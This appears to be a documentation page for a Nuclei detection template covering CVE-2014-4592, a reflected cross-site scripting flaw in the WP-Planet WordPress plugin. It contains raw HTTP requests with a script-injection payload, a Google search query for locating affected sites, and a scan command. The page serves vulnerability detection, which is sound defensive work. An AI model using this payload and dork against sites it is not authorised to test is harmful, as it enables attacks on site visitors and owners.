WP Planet <= 0.1 - Cross-Site Scripting
ID: CVE-2014-4592
Severity: medium
Author: daffainfo
Tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,czepol
Description
Section titled “Description”A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
YAML Source
Section titled “YAML Source”id: CVE-2014-4592
info: name: WP Planet <= 0.1 - Cross-Site Scripting author: daffainfo severity: medium description: | A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter. remediation: | Update to the latest version of WP Planet plugin (0.1 or higher) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4592 cwe-id: CWE-79 epss-score: 0.00135 epss-percentile: 0.48718 cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: czepol product: wp-planet framework: wordpress google-query: inurl:"/wp-content/plugins/wp-planet" tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,czepol
http: - raw: - | GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1 Host: {{Hostname}} - | GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body_1 words: - "WP Planet"
- type: word part: body_2 words: - "<script>alert(document.domain)</script>"
- type: word part: header_2 words: - text/html
- type: status status: - 200# digest: 4a0a00473045022100e11f8fd700d4c92009bddfaa6b63f627f7edef3af7b758d08c06f0e1fe555f0502205d585d1d4bab68b1281c1a0d9b8cc64cfa41d21538d0ecb37da3e6580797b342:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-4592.yaml"